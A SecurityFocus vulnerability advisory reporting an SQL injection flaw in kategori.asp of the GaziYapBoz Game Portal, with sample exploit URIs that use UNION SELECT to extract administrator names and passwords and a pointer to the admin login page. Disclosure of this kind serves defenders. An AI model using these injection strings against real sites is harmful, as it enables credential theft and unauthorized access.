Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

GaziYapBoz Game Portal Kategori.ASP SQL injection Vulnerability

Attackers can use a browser to exploit this issue.

Sample exploit URIs have been provided:

http://www.example.com/indir.asp?id=4765&sIslem=%DDndirVuln.Username :
/kategori.asp?kategori='+union+select+0,1,2,3,name,5,6,7,8,9+from+adminPassword :
/kategori.asp?kategori='+union+select+0,1,2,3,password,5,6,7,8,9+from+adminLogin :
/personelgirisizni.asp







 

Privacy Statement
Copyright 2009, SecurityFocus